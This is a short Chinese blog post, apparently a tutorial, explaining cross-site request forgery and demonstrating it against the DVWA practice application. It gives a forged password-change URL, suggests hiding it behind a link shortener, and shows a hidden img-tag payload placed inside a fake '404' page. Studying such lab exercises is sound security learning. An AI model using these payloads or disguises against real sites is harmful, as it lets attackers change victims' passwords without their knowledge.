CSRF跨站伪造请求攻击

一、CSRF 跨站伪造请求介绍

  CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。

 

二、CSRF漏洞利用

构造恶意链接: http://ip地址/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change# 当用户在当前cookie没有过期时,点击该链接完成用户密码修改

使用短连接伪装 http://dwz.cn/

三、CSRF漏洞高级利用

构造恶意页面,但是使用img标签隐藏真实目的 <img src="http://ip/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#" border="0" style="display:none;"/> <h1>404<h1> <h2>file not found.<h2>

 

posted @ 2020-11-20 10:06  ggsa202008  阅读(109)  评论(0编辑  收藏  举报